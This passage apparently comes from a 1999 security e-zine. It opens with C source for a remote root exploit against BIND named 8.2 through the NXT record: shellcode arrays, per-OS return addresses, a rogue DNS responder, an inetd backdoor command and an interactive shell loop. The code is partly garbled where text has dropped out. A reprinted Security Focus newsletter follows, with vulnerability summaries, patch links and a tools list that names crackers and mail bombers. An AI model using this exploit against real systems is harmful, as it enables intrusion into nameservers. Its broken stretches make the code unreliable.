0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46, 0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50, 0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0, 0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c, 0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67, 0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65, 0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72, 0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69, 0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c, 0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79, 0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f, 0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67, 0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75, 0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61, 0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d, 0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d, 0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80, 0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0, 0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2, 0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46, 0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46, 0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9, 0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e, 0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68, 0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f, 0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0}; struct arch { int id; char *name; char *code; int codesize; unsigned long safe; unsigned long ret; int length; }; struct arch archlist[] = { {1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode, sizeof(linuxcode), 0, 0xbfffd6c3, 6500}, {2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode, sizeof(linuxcode), 0, 0x80f79ae, 6500}, {3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738, 0xffbedbd0, 11000}, {4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0, 11000}, {5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xbfbfbdb8, 7000}, {6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xefbfbb00, 7000}, {7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1, 0xefbfbb00, 7000}, {0, 0, 0, 0} }; int arch=0; char *command=0; /* these two dns routines from dspoof/jizz */ /* pull out a compressed query name */ char *dnssprintflabel(char *s, char *buf, char *p) { unsigned short i,len; char *b=NULL; len=(unsigned short)*(p++); while (len) { while (len >= 0xC0) { if (!b) b=p+1; p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000); len=(unsigned short)*(p++); } for (i=0;i>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob "); b=(unsigned long*)(a+4166); *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //i2 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //i5 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o0 - significant *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o2 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o6 - significant *b++=htonl(archlist[arch].ret); //o7 - retaddr } } int form_response(HEADER *packet, char *buf) { char query[512]; int qtype; HEADER *dnsh; char *p; char *walker; memset(buf,0,sizeof(buf)); dnsh = (HEADER *) buf; dnsh->id = packet->id; dnsh->qr=1; dnsh->aa=1; dnsh->qdcount = htons(1); dnsh->ancount = htons(1); dnsh->arcount = htons(1); dnsh->rcode = 0; walker=(char*)(dnsh+1); p=dnssprintflabel(query, (char *)packet, (char*)(packet+1)); query[strlen(query) - 1] = 0; qtype=*((unsigned short *)p); printf("%s type=%d\n",query, ntohs(qtype)); /* first, the query */ walker=dnsaddlabel(walker, query); PUTSHORT(ntohs(qtype), walker); //PUTSHORT(htons(T_PTR), walker); PUTSHORT(1,walker); /* then, our answer */ /* query IN A 1.2.3.4 */ walker=dnsaddlabel(walker, query); PUTSHORT(T_A, walker); PUTSHORT(1, walker); PUTLONG(60*5, walker); PUTSHORT(4, walker); sprintf(walker,"%c%c%c%c",1,2,3,4); walker+=4; /* finally, we make named do something more interesting */ walker=dnsaddlabel(walker, query); PUTSHORT(T_NXT, walker); PUTSHORT(1, walker); PUTLONG(60*5, walker); /* the length of one label and our arbitrary data */ PUTSHORT(archlist[arch].length+7, walker); PUTSHORT(6, walker); sprintf(walker,"admadm"); walker+=6; PUTSHORT(0, walker); make_overflow(walker); walker+=archlist[arch].length; PUTSHORT(0, walker); return walker-buf; } #define max(x,y) ((x)>(y)?(x):(y)) int proxyloop(int s) { char snd[1024], rcv[1024]; fd_set rset; int maxfd, n; sleep(1); printf("Entering proxyloop..\n"); strcpy(snd, "cd /; uname -a; pwd; id;\n"); write(s, snd, strlen(snd)); for (;;) { FD_SET(fileno(stdin), &rset); FD_SET(s, &rset); maxfd = max(fileno(stdin), s) + 1; select(maxfd, &rset, NULL, NULL, NULL); if (FD_ISSET(fileno(stdin), &rset)) { bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd) - 2, stdin); write(s, snd, strlen(snd)); } if (FD_ISSET(s, &rset)) { bzero(rcv, sizeof(rcv)); if ((n = read(s, rcv, sizeof(rcv))) == 0) exit(0); if (n < 0) { return -3; } fputs(rcv, stdout); } } return 0; } int main(int argc, char **argv) { int s, fromlen, res, sl, s2; struct sockaddr_in sa, from, to; char buf[16384]; char sendbuf[16384]; unsigned short ts; int i; if (argc<2) { fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]); fprintf(stderr,"Available architectures:\n"); i=-1; while(archlist[++i].id) fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name); exit(1); } arch=atoi(argv[1])-1; if (argc==3) command=argv[2]; if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1) { perror("socket"); exit(1); } bzero(&sa, sizeof sa); sa.sin_family=AF_INET; sa.sin_addr.s_addr=INADDR_ANY; sa.sin_port=htons(53); if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1) { perror("bind"); exit(1); } do { fromlen=sizeof(from); if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from, &fromlen)) == -1) { perror("recvfrom"); exit(1); } printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr), ntohs(from.sin_port)); sl=form_response((HEADER *)buf,sendbuf); /* now lets connect to the nameserver */ bzero(&to, sizeof(to)); to.sin_family=AF_INET; to.sin_addr=from.sin_addr; to.sin_port=htons(53); if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1) { perror("socket"); exit(1); } if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1) { perror("connect"); exit(1); } ts=htons(sl); write(s2,&ts,2); write(s2,sendbuf,sl); if (archlist[arch].safe>1) close(s2); } while (archlist[arch].safe>1); /* infinite loop for sparc */ proxyloop(s2); exit(1); } @HWA 53.0 Security Focus Newsletter #13 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Focus Newsletter #13 Table of Contents: I. INTRODUCTION II. BUGTRAQ SUMMARY 1. Pacific Software URL Live! Directory Traversal Vulnerability 2. Squid Web Proxy Authentication Failure Vulnerability 3. Zeus Webserver Possible Remote root Compromise 4. Falcon Web Server Directory Traversal Vulnerability 5. AIX Filtering Vulnerability 6. MacOS 9 Console Lock Bypass Vulnerability 7. WFTPD Remote Buffer Overflow Vulnerability 8. Netscape Messaging Server RCPT TO DoS Vulnerability 9. Celtech ExpressFS USER Buffer Overflow Vulnerability 10. NT Services Denial of Service 11. FreeBSD Amanda 'amandad' Symlink Vulnerability 12. Multiple Vendor Linux NIS Vulnerabilities 13. aVirt Mail Server Buffer Overflow III. PATCH UPDATES 1. Vulnerability Patched: Zeus Webserver Possible Remote root Compromise 2. Vulnerability Patched: Squid Web Proxy Authentication Failure 3. Vulnerability Patched: Falcon Web Server Directory Traversal Vulnerability 4. Vulnerability Patched: Debian, Redhat, SuSE NIS Vulnerabilties IV. INCIDENTS SUMMARY 1. Repeated FTP Connections (Thread) 2. Re: Default Trojan Port list (Thread) 3. SMB Port scanning (Thread) 4. Re: More Log Sharing (Thread) 5. Re: ICP (Internet Cache Protocol) problems... (Thread) V. VULN-DEV RESEARCH LIST SUMMARY 1. Re: IE 5.0 vulnerability (Thread) 2. Re: possible gnome remote overflow (Thread) 3. Re: Need help cracking wwwboard passwd.txt (Thread) 4. ICQ 2000 (Thread) 5. Re: forged packets? (Thread) 6. Accessing IE/Netscape incomming data (Thread) 7. linux userland ip spoofing vulnerability (Thread) 8. FreeBSD listen() 9. stealth executables 10. AIM 3.0 11. Possibly exploitable overflow in Alibaba 2.0 VI. SECURITY JOBS Discussion: 1. IT security salary question (Thread) Seeking Staff: 1. Infrastructure Security Architect - DC Area 2. Information Security Consultant(s) - NY #111 3. Security Awareness Specialist - NY #215 VII. SECURITY SURVEY RESULTS VIII. SECURITY FOCUS TOP 6 TOOLS 1. Security Focus Pager (NT/98) 2. ShadowScan (NT/98) 3. East-Tec Eraser (NT/98) 4. Evidence Eliminator (NT/98) 5. Access Sentinel 3.0 (NT/98) 6. Alot MoniCA 1.1 (NT/98) IX. SPONSOR INFORMATION - NT OBJECTives, Inc. X. SUBSCRIBE/UNSUBSCRIBE INFORMATION I. INTRODUCTION ----------------- Welcome to the Security Focus 'week in review' newsletter issue 13 sponsored by NT OBJECTives, Inc. . To start this this newsletter we would like to introduce you to our newest addition to the Security Focus team, Eric Schultze. Eric Schultze is the new Director of Microsoft Content for Security Focus Inc. Eric has been deploying, assessing, and securing Microsoft products for the last 6 years, working first as a Network Administrator for a retail organization, and later as a security professional for both Price Waterhouse and Ernst & Young. Eric was a co-founder of the highly popular "Extreme Hacking: Defending Your Site" course and is a popular speaker at security events including Blackhat, CSI, and various international conferences. He is a contributing author to "Hacking Exposed: Network Security Secrets and Solutions" and is frequently quoted in the press, including TIME Magazine, Infoworld, and ComputerWorld. II. BUGTRAQ SUMMARY 1999-10-24 to 199-11-01 --------------------------------------------- 1. Pacific Software URL Live! Directory Traversal Vulnerability BugTraq ID: 746 Remote: Yes Date Published: 1999-10-28 Relevant URL: http://www.securityfocus.com/bid/746 Summary: The URL Live! free webserver from Pacific software is susceptible to the "../" directosy traversal vulnerability. By using the '../' string in a URL, an attacker can gain read access to files outside the intended web file structure. 2. Squid Web Proxy Authentication Failure Vulnerability BugTraq ID: 741 Remote: Yes Date Published: 1999-10-25 Relevant URL: http://www.securityfocus.com/bid/741 Summary: There is a vulnerability present in certain versions of the Squid Web Proxy Cache developed by the National Science Foundation. This problem is only in effect when users of the cache are using an external authenticator. The following is quoted from the original Bugtraq posting on this issue, this message in it's entirety is available in the 'Credits' section of this vulnerability. "After decoding the base64 encoded "user:password" pair given by the client, squid doesn't strip out any '\n' or '\r' found in the resulting string. Given such a string, any external authenticator will receive two lines instead of one, and most probably send two results. Now, any subsequent authentication exchange will has its answer shifted by one. Therefore, a malicious user can gain access to sites he or she should not have access to." 3. Zeus Webserver Possible Remote root Compromise BugTraq ID: 742 Remote: Yes Date Published: 1999-10-25 Relevant URL: http://www.securityfocus.com/bid/742 Summary: There are a number of vulnerabilities in the Zeus Web Server, that if carried out in combination can lead to a remote root compromise.The Zeus Web Server gives its users the option to use a pre-built search CGI program for their virtual website. The program accepts (as its http form variables) server filesystem paths as its arguments. Because of this, it is possible to display any file that the server has access to. Thus, by altering parameters to "search", an attacker can obtain the password hash for the admin user by displaying the configuration file. Once a password for the admin user is cracked, it is possible to execute aribtrary commands through the web based configuration UI as root (which the configuration UI runs as). 4. Falcon Web Server Directory Traversal Vulnerability BugTraq ID: 743 Remote: Yes Date Published: 1999-10-26 Relevant URL: http://www.securityfocus.com/bid/743 Summary: The Falcon Webserver is a personal desktop webserver designed for low volume page serving. Certain versions of this software do not properly handle user supplied URL's. Therefore a user can browse outside of the web browser 'root' directory at any file on the file system depending on permissions. A second problem exists wherein a longer than expected URL will elicit an error message from the server which betrays the location of the 'root' directory. 5. AIX Filtering Vulnerability BugTraq ID: 744 Remote: Yes Date Published: 1999-10-26 Relevant URL: http://www.securityfocus.com/bid/744 Summary: The filtering modules for AIX 4.3.2 do not allow you to filter tcp port numbers higher than 32767. This example was in the BugTraq posting regarding this problem: genfilt -v 4 -a D -s 0.0.0.0 -m 0.0.0.0 -d 0.0.0.0 -M 0.0.0.0 \ -c udp -o any -O eq -P 123 -l n -w I -i all Works fine... but... genfilt -v 4 -a D -s 0.0.0.0 -m 0.0.0.0 -d 0.0.0.0 -M 0.0.0.0 -c udp \ -o any -O eq -P 32768 -l n -w I -i all Fails with: Bad destination port/ICMP type "32768". It is believed that this problem is a result of incorrect type (short int) being used for the port number argument. Compromise may occur through services listening on ports that are higher than 32767. 6. MacOS 9 Console Lock Bypass Vulnerability BugTraq ID: 745 Remote: No Date Published: 1999-10-26 Relevant URL: http://www.securityfocus.com/bid/745 Summary: MacOS 9 includes an idle-activated console lock feature, similar to a screensaver password in other operating systems. After a certain length of user inactivity, a dialog box appears stating that a password must be entered. After the user clicks 'OK' another dialog box appears offering the option to either supply a password or to log out the current user. If the 'log out' option is chosen, any programs running will start to shut down. In certain programs, dialog boxes are created in the shutdown process (for example, "Exit without saving? OK/Cancel"). If the user selects 'Cancel', the shutdown process is aborted and the user is returned to the current session without ever having to enter a password. 7. WFTPD Remote Buffer Overflow Vulnerability BugTraq ID: 747 Remote: Yes Date Published: 1999-10-28 Relevant URL: http://www.securityfocus.com/bid/747 Summary: There is a remotely exploitable buffer overflow vulnerability in WFTPD that is known to affect versions 2.34 and 2.40. The overflow exists in the MKD and CWD commands, which if argumented with long strings in the right order, can overrun the buffer and allow for aribtrary code execution on the target host. This is from the BugTraq posting: First command MKD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa Second command CWD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa Crash.....Overflow. 8. Netscape Messaging Server RCPT TO DoS Vulnerability BugTraq ID: 748 Remote: Yes Date Published: 1999-10-29 Relevant URL: http://www.securityfocus.com/bid/748 Summary: Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service. 9. Celtech ExpressFS USER Buffer Overflow Vulnerability BugTraq ID: 749 Remote: Yes Date Published: 1999-10-29 Relevant URL: http://www.securityfocus.com/bid/749 Summary: Celtech's ExpressFS FTP server has been found to be vulnerable by means of a buffer overflow. If an argument of sufficient length is passed after the USER command, the next command sent will cause it to crash. 10. NT Services Denial of Service BugTraq ID: 754 Remote: Yes Date Published: 1999-10-31 Relevant URL: http://www.securityfocus.com/bid/754 Summary: A specially crafted packet can cause a denial of service in on an NT 4.0 host, rendering local administration and network communication next to useless. This attack will crash the "services" executable, which in turn, disables the ability for the machine to perform actions via 'named pipes'. As a consequence, users will be unable to remotely logon, logoff, manage the registry, create new file share connections, or perform remote administration. Services such as Internet Information Server may also fail to operate as expected. The problem lies within the manner that srvsvc.dll makes calls to services.exe. Certain MSRPC calls will return NULL values which are not correctly interpreted by services.exe. This, in turn, may lead to a crash of Services.exe. If this denial of service is combined with a number of other exploits, it may be possible to have this attack spawn a Debugger (ie Dr Watson) call on the host, which, if trojaned, may execute malicious code on the target host. 11. FreeBSD Amanda 'amandad' Symlink Vulnerability BugTraq ID: 752 Remote: No Date Published: 1999-11-01 Relevant URL: http://www.securityfocus.com/bid/752 Summary: Amanda is a popular file backup system used by several free UNIX distributions. Under certain versions of the distribution shipped with FreeBSD 3.3-RELEASE the amanda daemon itself (amandad) is subject to a symlink vulnerability which could result in a denial of service attack. This is caused because amandad during it's process of operations writes a debug file to the /tmp directory. This file (/tmp/amandad.debug) does not check for existing symlinked files of the same name. Amandad is not run SUID/SGID so the end result of this vulnerability would most likely be the ability to clobber other files owned by the UID which owns the amandad process. The output in this case cannot be tailored and consists of Amanda debug output. 12. Multiple Vendor Linux NIS Vulnerabilities BugTraq ID: 753 Remote: Yes Date Published: 1999-11-01 Relevant URL: http://www.securityfocus.com/bid/753 Summary: ypserv releases previous to 1.3.9 contain two different vulnerabilties: Any NIS domain administrator can inject password tables, and users can modify the GECOS field and login shell values for other users. Also, rpc.yppasswd prior 1.3.6.92 has a standard buffer overflow problem in the md5 hash generation code. 13. aVirt Mail Server Buffer Overflow BugTraq ID: 755 Remote: Unknown Date Published: 1999-10-31 Relevant URL: http://www.securityfocus.com/bid/755 Summary: The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote buffer overflow vulnerability. The buffer overflow can be initiated by passing 856 characters in the password field. III. PATCH UPDATES 1999-10-24 to 199-11-01 ------------------------------------------- 1. Vendor: Zeus Product: Zeus Webserver Patch Location: http://support.zeus.co.uk/news/exploit.html Vulnerability Patched: Zeus Webserver Possible Remote root Compromise BugTraq ID: 742 Relevant URLS: http://www.securityfocus.com/bid/742 2. Vendor: National Science Foundation Product: Squid Web Proxy Patch Location: http://squid.nlanr.net/Versions/v2/2.2/bugs/squid-2.2.stable5-newlines_in_auth.patch Vulnerability Patched: Squid Web Proxy Authentication Failure Vulnerability BugTraq ID: 741 Relevant URLS: http://www.securityfocus.com/bid/741 http://squid.nlanr.net/Doc/Users-Guide/ http://squid.nlanr.net/ 3. Vendor: Blueface Software Product: Falcon Webserver Patch Location: http://www.blueface.com/products.html#fws Vulnerability Patched: Falcon Web Server Directory Traversal Vulnerability BugTraq ID: 743 Relevant URLS: http://www.securityfocus.com/bid/743 4. Vendor: Debian, Redhat, SuSE Product: ypserv/NIS package Patch Location: -RedHat patches: Red Hat Linux 4.x: ftp://updates.redhat.com/4.2/i386/ypserv-1.3.9-0.4.2.i386.rpm ftp://updates.redhat.com/4.2/alpha/ypserv-1.3.9-0.4.2.alpha.rpm ftp://updates.redhat.com/4.2/sparc/ypserv-1.3.9-0.4.2.sparc.rpm ftp://updates.redhat.com/4.2/SRPMS/ypserv-1.3.9-0.4.2.src.rpm Red Hat Linux 5.x: ftp://updates.redhat.com/5.2/i386/ypserv-1.3.9-0.5.2.i386.rpm ftp://updates.redhat.com/5.2/alpha/ypserv-1.3.9-0.5.2.alpha.rpm ftp://updates.redhat.com/5.2/sparc/ypserv-1.3.9-0.5.2.sparc.rpm ftp://updates.redhat.com/5.2/SRPMS/ypserv-1.3.9-0.5.2.src.rpm Red Hat Linux 6.x: ftp://updates.redhat.com/6.1/i386/ypserv-1.3.9-1.i386.rpm ftp://updates.redhat.com/6.0/alpha/ypserv-1.3.9-1.alpha.rpm ftp://updates.redhat.com/6.0/sparc/ypserv-1.3.9-1.sparc.rpm ftp://updates.redhat.com/6.1/SRPMS/ypserv-1.3.9-1.src.rpm -SuSE patches: ftp://ftp.suse.com/pub/suse/i386/update/6.1/n1/ypserv-1.3.9-0.i386.rpm ftp://ftp.suse.com/pub/suse/axp/update/6.1/n1/ypserv-1.3.9-0.alpha.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.2/n1/ypserv-1.3.9-0.i386.rpm -Debian patches: Source archives: http://security.debian.org/dists/stable/updates/source/nis_3.5-2.diff.gz http://security.debian.org/dists/stable/updates/source/nis_3.5-2.dsc http://security.debian.org/dists/stable/updates/source/nis_3.5.orig.tar.gz Architecture-specific binaries: http://security.debian.org/dists/stable/updates/binary-alpha/nis_3.5-2_alpha.deb http://security.debian.org/dists/stable/updates/binary-i386/nis_3.5-2_i386.deb http://security.debian.org/dists/stable/updates/binary-m68k/nis_3.5-2_m68k.deb http://security.debian.org/dists/stable/updates/binary-sparc/nis_3.5-2_sparc.deb These files will be moved into ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon. For not yet released architectures please refer to the appropriate directory ftp://ftp.debian.org/debian/dists/sid/binary-$arch/. Vulnerability Patched: Linux NIS Vulnerabilities BugTraq ID: 753 Relevant URLS: http://www.securityfocus.com/bid/753 INCIDENTS SUMMARY 1999-10-24 to 199-11-01 ------------------------------------------ 1. Repeated FTP Connections (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=Pine.LNX.4.10.9910251654160.20244-100000@ns.doomsday.com 2. Re: Default Trojan Port list (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=19991025150329.55777.qmail@hotmail.com 3. SMB Port scanning (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=19991026132728267.AAA391@paragon3.paragontech.com@dennisdcomp 4. Re: More Log Sharing (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=3816096E.F75578CA@cert.org 5. Re: ICP (Internet Cache Protocol) problems... (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=Pine.LNX.4.10.9910280257540.492-100000@mad.unix.kg V. VULN-DEV RESEARCH LIST SUMMARY 1999-10-24 to 199-11-01 ---------------------------------------------------------- 1. Re: IE 5.0 vulnerability (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=000201bf1e48$65a2cd30$021d85d1@youwant.to 2. Re: possible gnome remote overflow (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=38135F5B.3A2B2369@cse.ogi.edu 3. Re: Need help cracking wwwboard passwd.txt (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=199910240555.PAA28579@rockhampton-psvr.qld.hotkey.net.au 4. ICQ 2000 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=19991025114035.J5069@securityfocus.com 5. Re: forged packets? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=001a01bf1f1c$86c8dfc0$021d85d1@youwant.to 6. Accessing IE/Netscape incomming data (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=2321.991026@infinet.com 7. linux userland ip spoofing vulnerability (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=Pine.LNX.4.10.9910270708380.638-200000@yahoo.com 8. FreeBSD listen() Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=3701.991027@SECURITY.NNOV.RU 9. stealth executables Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=199910270223.MAA09528@rockhampton-psvr.qld.hotkey.net.au 10. AIM 3.0 Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=19991028172023.18236.qmail@securityfocus.com 11. Possibly exploitable overflow in Alibaba 2.0 Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=199910281536.RAA18018@mail1.cityweb.de VI. SECURITY JOBS SUMMARY 1999-10-24 to 199-11-01 --------------------------------------------------- Discussion: 1. IT security salary question (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=CB64F884F39FD2118EC600A024E6522C7F5483@wfhqex05.wangfed.com Seeking Staff: 1. Infrastructure Security Architect - DC Area Reply to: Steve Goldsby Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-15&msg=NCBBLNPMHFBGKOMJOGILKEOGFAAA.sgoldsby@integrate-u.com 1. Security Position Waanted in NJ or NYC Reply to: Gould, Beau - Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=3816170C.919BAEEA@nyc-search.com 2. Information Security Consultant(s) - NY #111 Reply to: Lori Sabat - Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=19991027151154.337.qmail@securityfocus.com 3. Security Awareness Specialist - NY #215 Reply to: Lori Sabat - Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=19991027152336.504.qmail@securityfocus.com VII. SECURITY SURVEY 1999-10-24 to 199-11-01 ---------------------------------------------- The question for 1999-10-24 to 199-11-01 was: "What do you think the primary motivator for recent vendor initiatives in security are?" Results: 1. They're genuinely concerned about security. 1% / 1 votes 2. They want good press. 1% / 1 votes 3. They want to avoid bad press, by being able to claim they're at least trying. 47% / 33 votes 4. Security is buzzword compliant. 43% / 30 votes Total number of votes: 69 votes VIII. SECURITY FOCUS TOP 6 TOOLS 1999-10-24 to 199-11-01 -------------------------------------------------------- 1. Security Focus Pager by Security Focus Relevant URL: http://www.securityfocus.com/pager This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable). 2. ShadowScan by RedShadow Relevant URL: http://www.securityfocus.com/data/tools/auditing/ShadowScan.zip Shadow Advantis Administrator Tools - Ping (SSPing), Port Scanner, , IP Scaner, Site Info (is intended for fast definition of services started on the host), Network Port Scaner,Tracert, Telnet,Nslookup, Finger,Echo,Time,UPD test,File Info, Compare File, Netstat, SysInfo,Crypt, Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info Shadow Hack and Crack - WinNuke, Mail Bomber, POP3, HTTP, SOCKS, FTP Crack (definitions of the password by a method of search),Unix password Crack, Finger over SendMail, Buffer Overlow , Smb Password Check , CRK Files ShadowPortGuard - code for detection of connection on the certain port Shadow Novell NetWare Crack - code for breaking Novell NetWare 4.x And more other functions... 3. East-Tec Eraser by EAST Technologies Relevant URL: http://www.securityfocus.com/data/tools/eerase20.zip East-Tec Eraser is an advanced security application designed to completely eliminate sensitive data from your computer. East-Tec Eraser works on Windows 98/95 and Windows NT. Eraser introduces a new meaning for the verb TO ERASE. Erasing a file now means wiping its contents beyond recovery, scrambling its name and dates and finally removing it from disk. When you want to get rid of sensitive files or folders beyond recovery, add them to the Eraser list of doomed files and ask Eraser to do the job. Eraser offers tight integration with the Windows shell, so you can drag files and folders from Explorer and drop them in Eraser, or you can erase them directly from Explorer by selecting "Erase beyond recovery" 